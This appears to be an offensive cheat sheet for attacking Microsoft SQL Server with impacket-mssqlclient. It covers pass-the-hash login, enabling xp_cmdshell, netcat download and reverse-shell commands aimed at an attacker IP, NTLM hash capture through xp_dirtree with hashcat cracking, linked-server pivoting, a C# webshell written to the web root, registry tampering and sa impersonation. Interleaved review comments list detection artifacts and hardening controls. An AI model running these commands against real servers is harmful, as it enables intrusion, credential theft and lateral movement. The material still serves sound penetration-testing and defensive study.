
Overview

impacket-mssqlclient is an interactive MSSQL client that supports SQL auth, Windows/NTLM auth, pass-the-hash, and Kerberos. Once connected, escalate from database access to OS command execution, file reads, and lateral movement.
pip install impacket

Authentication

SQL Authentication

impacket-mssqlclient sa:'P@ssw0rd!'@10.10.10.20

Windows Authentication

impacket-mssqlclient corp.local/dbadmin:'P@ssw0rd!'@10.10.10.20 -windows-auth

Pass-the-Hash

impacket-mssqlclient corp.local/dbadmin@10.10.10.20 -windows-auth -hashes :aad3b435b51404eeaad3b435b51404ee

Kerberos Authentication

# With a ccache file
export KRB5CCNAME=dbadmin.ccache
impacket-mssqlclient -k -no-pass DC01.corp.local

# Specify DC for KDC
impacket-mssqlclient -k -no-pass -dc-ip 10.10.10.1 MSSQL01.corp.local

Custom Port

impacket-mssqlclient sa:'P@ssw0rd!'@10.10.10.20 -port 1434

Basic Connection

impacket-mssqlclient sa:'P@ssw0rd!'@10.10.10.20 -windows-auth
Once connected, you get an interactive SQL prompt:
-- Check current user and privileges
-- SYSTEM_USER is the server login; USER_NAME() is the database user in the current database.
-- IS_SRVROLEMEMBER returns 1 when the login holds the role, 0 when it does not, NULL if the role name is invalid.
SELECT SYSTEM_USER;
SELECT USER_NAME();
SELECT IS_SRVROLEMEMBER('sysadmin');

-- List databases
SELECT name FROM sys.databases;

-- List tables in a database
USE targetdb;
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES;

-- Query data
-- TOP 10 * is acceptable for a first look; name columns explicitly once the schema is known.
SELECT TOP 10 * FROM dbo.users;

Enable xp_cmdshell

xp_cmdshell executes OS commands. Disabled by default — requires sysadmin to enable.

Via sp_configure

-- Enable advanced options
-- NOTE(review): sp_configure + RECONFIGURE change persisted, server-wide settings. SQL Server
-- writes a "Configuration option '<name>' changed from 0 to 1" line to the ERRORLOG for each
-- change, which is the most reliable artifact for detecting this step.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

-- Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Using the Built-in Command

The mssqlclient shell has a shortcut:
SQL> enable_xp_cmdshell

Execute OS Commands via xp_cmdshell

-- Basic command execution
-- NOTE(review): xp_cmdshell runs as the SQL Server service account (or as the configured
-- xp_cmdshell proxy account for non-sysadmin callers). The cmd.exe / powershell.exe child
-- processes of sqlservr.exe that this produces are the standard detection signal.
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'ipconfig /all';
EXEC xp_cmdshell 'type C:\Users\Administrator\Desktop\flag.txt';

-- Download and execute payload
EXEC xp_cmdshell 'powershell -c "IWR http://10.10.14.5/nc.exe -OutFile C:\temp\nc.exe"';
EXEC xp_cmdshell 'C:\temp\nc.exe 10.10.14.5 4444 -e cmd.exe';

-- Reverse shell (PowerShell one-liner)
EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0A...';

File Read

OPENROWSET

-- Read a file via OPENROWSET
-- NOTE(review): the 'Ad Hoc Distributed Queries' option enabled below governs OPENROWSET with an
-- OLE DB provider. The BULK form used here is gated instead by the ADMINISTER BULK OPERATIONS
-- permission (bulkadmin role), and for SQL-authenticated sessions the file is read under the
-- service account's identity — audit that grant and the account's file ACLs, not only the option.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE;

SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS Contents;
SELECT * FROM OPENROWSET(BULK 'C:\inetpub\wwwroot\web.config', SINGLE_CLOB) AS Contents;

BULK INSERT

-- Bulk insert file into a temp table
-- NOTE(review): same permission gate as OPENROWSET(BULK): ADMINISTER BULK OPERATIONS plus INSERT
-- on the target table. BULK INSERT uses its default field/row terminators here, so the result
-- depends on the file's layout — confirm against the target file.
CREATE TABLE #file (line VARCHAR(MAX));
BULK INSERT #file FROM 'C:\Windows\System32\drivers\etc\hosts';
SELECT * FROM #file;
DROP TABLE #file;

Capture NTLM Hash via xp_dirtree

Force the MSSQL service account to authenticate to your SMB server, capturing its NetNTLMv2 hash.
# On attacker — start SMB server
impacket-smbserver SHARE /tmp -smb2support
-- On MSSQL — trigger UNC access
-- NOTE(review): xp_dirtree / xp_fileexist / xp_subdirs are typically executable by the public
-- role, so this step needs no elevated SQL privilege. The controls that matter are egress
-- filtering of SMB (TCP 445) from the database host, revoking EXECUTE on these procedures from
-- public, and SMB signing / EPA on services that could receive a relayed authentication.
EXEC xp_dirtree '\\10.10.14.5\SHARE', 1, 1;

-- Alternatives
EXEC xp_fileexist '\\10.10.14.5\SHARE\test';
EXEC master..xp_subdirs '\\10.10.14.5\SHARE\';
The MSSQL service account hash appears on your SMB server. Crack it or relay it.
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Linked Servers

Linked servers allow querying remote MSSQL instances through the current one. They often run with elevated privileges.

Enumerate Linked Servers

-- List linked servers
EXEC sp_linkedservers;
-- sys.servers also exposes is_rpc_out_enabled; EXEC (...) AT below only works on links where it is 1.
SELECT * FROM sys.servers;

-- Check who the link runs as
-- NOTE(review): sys.sysservers is a compatibility view and these columns do not show the login
-- mapping. The remote credential each link uses is in sys.linked_logins (uses_self_credential,
-- remote_name); a link mapped to a fixed privileged remote login is what to audit.
SELECT srvname, srvproduct, isremote, islinked FROM sys.sysservers;

-- Test RPC to linked server
EXEC ('SELECT SYSTEM_USER') AT [LINKED-SRV];
EXEC ('SELECT IS_SRVROLEMEMBER(''sysadmin'')') AT [LINKED-SRV];
-- Execute a query on the linked server
EXEC ('SELECT @@SERVERNAME') AT [LINKED-SRV];

-- Enable xp_cmdshell on linked server (if sysadmin on that link)
-- The configuration change and the resulting child processes occur on the remote instance,
-- so detection there works the same way as on the local one.
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [LINKED-SRV];
EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [LINKED-SRV];
EXEC ('EXEC xp_cmdshell ''whoami''') AT [LINKED-SRV];

-- Double hop: linked server → another linked server
-- Each hop runs under the login mapping of the link that reaches it, not the original caller.
EXEC ('EXEC (''SELECT SYSTEM_USER'') AT [LINKED-SRV-2]') AT [LINKED-SRV-1];

Ole Automation Procedures

sp_OACreate provides an alternative to xp_cmdshell for command execution and file operations.

Enable Ole Automation

-- Enable Ole Automation Procedures
-- NOTE(review): like xp_cmdshell, this is a persisted server-wide option and the change is
-- logged to the ERRORLOG; it should stay disabled unless a documented application needs it.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;

Write a File

-- Write a webshell or payload to disk
-- Create a FileSystemObject, open a text file, write one line, then release both COM handles.
-- NOTE(review): the file is written as the SQL Server service account; a file appearing under
-- the web root with sqlservr.exe as the writing process is the detection signal (file
-- integrity monitoring on C:\inetpub\wwwroot).
DECLARE @ole INT;
DECLARE @file INT;
EXEC sp_OACreate 'Scripting.FileSystemObject', @ole OUT;
-- Trailing 1 is CreateTextFile's overwrite flag: an existing file at the path is replaced.
EXEC sp_OAMethod @ole, 'CreateTextFile', @file OUT, 'C:\inetpub\wwwroot\cmd.aspx', 1;
EXEC sp_OAMethod @file, 'WriteLine', NULL, '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]); %>';
EXEC sp_OAMethod @file, 'Close';
-- Destroy handles in reverse order of creation; leaking them keeps the objects alive in the session.
EXEC sp_OADestroy @file;
EXEC sp_OADestroy @ole;

Execute a Command via Ole Automation

-- Run a command through WScript.Shell. NULL in the sp_OAMethod return slot discards the
-- return value, and Run does not hand back the command's output, hence the redirect to a file.
-- NOTE(review): process ancestry is again sqlservr.exe -> cmd.exe, the same detection as xp_cmdshell.
DECLARE @output INT;
EXEC sp_OACreate 'WScript.Shell', @output OUT;
EXEC sp_OAMethod @output, 'Run', NULL, 'cmd.exe /c whoami > C:\temp\output.txt';
EXEC sp_OADestroy @output;

Enable xp_cmdshell via Ole Automation

When sp_configure is blocked (trigger/policy), use Ole Automation to modify the registry directly and enable xp_cmdshell.
-- Enable Ole Automation first (if not already)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;

-- Write registry key to enable xp_cmdshell
-- NOTE(review): the path is instance-specific — MSSQL15.MSSQLSERVER is the default instance of
-- SQL Server 2019; other versions/instances use a different key. sp_configure values are
-- persisted in master (sys.configurations), and this page does not establish that the engine
-- honours this registry value, so treat the technique as unverified.
-- Either write below modifies HKLM under the SQL Server instance key; registry auditing on that
-- key (Event ID 4657 with the service account as subject) is the detection.
DECLARE @reg INT;
EXEC sp_OACreate 'WScript.Shell', @reg OUT;
EXEC sp_OAMethod @reg, 'RegWrite', NULL, 'HKLM\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQLServer\Configuration\xp_cmdshell', 1, 'REG_DWORD';
EXEC sp_OADestroy @reg;

-- Alternatively, use xp_regwrite (if available)
EXEC xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQLServer\Configuration', 'xp_cmdshell', 'REG_DWORD', 1;
After modifying the registry, restart the SQL service or try RECONFIGURE to apply changes.

EXECUTE AS LOGIN (Impersonation)

If your user has impersonation privileges, escalate by executing as a more privileged login.

Enumerate Impersonation Privileges

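-- Audit IMPERSONATE grants on logins: which principal may impersonate which login.
-- For class 101 (SERVER_PRINCIPAL) rows in sys.server_permissions, major_id is the login the
-- permission is granted ON. The original query joined grantor_principal_id instead, which is
-- merely who issued the GRANT and is not necessarily the login that can be impersonated.
-- Only effective grants (state G / W) are listed; a DENY row would otherwise show up as a grant.
-- Result columns: principal = login that can be impersonated, can_impersonate = grantee.
SELECT
    target.name  AS principal,
    grantee.name AS can_impersonate
FROM sys.server_permissions AS perm
INNER JOIN sys.server_principals AS target
    ON perm.major_id = target.principal_id
INNER JOIN sys.server_principals AS grantee
    ON perm.grantee_principal_id = grantee.principal_id
WHERE perm.class = 101
  AND perm.type = 'IM'
  AND perm.state IN ('G', 'W');

-- Simpler check: distinct logins that some principal is permitted to impersonate
SELECT DISTINCT target.name
FROM sys.server_permissions AS perm
INNER JOIN sys.server_principals AS target
    ON perm.major_id = target.principal_id
WHERE perm.class = 101
  AND perm.permission_name = 'IMPERSONATE'
  AND perm.state IN ('G', 'W');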

Impersonate and Escalate

-- Impersonate the sa login
-- Requires IMPERSONATE on that login (or sysadmin). After this, SYSTEM_USER reports the
-- impersonated login; ORIGINAL_LOGIN() still returns the connecting login, which is what
-- SQL Server Audit records as the actor.
EXECUTE AS LOGIN = 'sa';

-- Verify
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');

-- Now enable xp_cmdshell as sa
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

-- Revert to original context
-- NOTE(review): REVERT only restores the execution context; the configuration changes made
-- above are persisted and remain in effect until explicitly reversed.
REVERT;

Database-Level Impersonation

-- Impersonate a database user (not server login)
-- EXECUTE AS USER is scoped to the current database: it changes USER_NAME() but not the server
-- login reported by SYSTEM_USER, and requires IMPERSONATE on that database user.
USE targetdb;
EXECUTE AS USER = 'dbo';

-- Check
SELECT USER_NAME();

Quick Reference

| Task | Command / Query |
|---|---|
| SQL auth connect | `impacket-mssqlclient sa:'pass'@HOST` |
| Windows auth | `impacket-mssqlclient DOMAIN/user:'pass'@HOST -windows-auth` |
| Pass-the-hash | `impacket-mssqlclient DOMAIN/user@HOST -windows-auth -hashes :NTLM` |
| Kerberos auth | `impacket-mssqlclient -k -no-pass HOST` |
| Check sysadmin | `SELECT IS_SRVROLEMEMBER('sysadmin')` |
| Enable xp_cmdshell | `enable_xp_cmdshell` (mssqlclient shortcut) |
| OS command | `EXEC xp_cmdshell 'whoami'` |
| Read file | `SELECT * FROM OPENROWSET(BULK 'path', SINGLE_CLOB) AS c` |
| Capture NTLM hash | `EXEC xp_dirtree '\\ATTACKER\SHARE'` |
| List linked servers | `EXEC sp_linkedservers` |
| Exec on linked server | `EXEC ('query') AT [LINKED-SRV]` |
| Ole Automation exec | `sp_OACreate 'WScript.Shell'` + `sp_OAMethod 'Run'` |
| Impersonate login | `EXECUTE AS LOGIN = 'sa'` |
| Check impersonation | Query `sys.server_permissions` where `type = 'IM'` |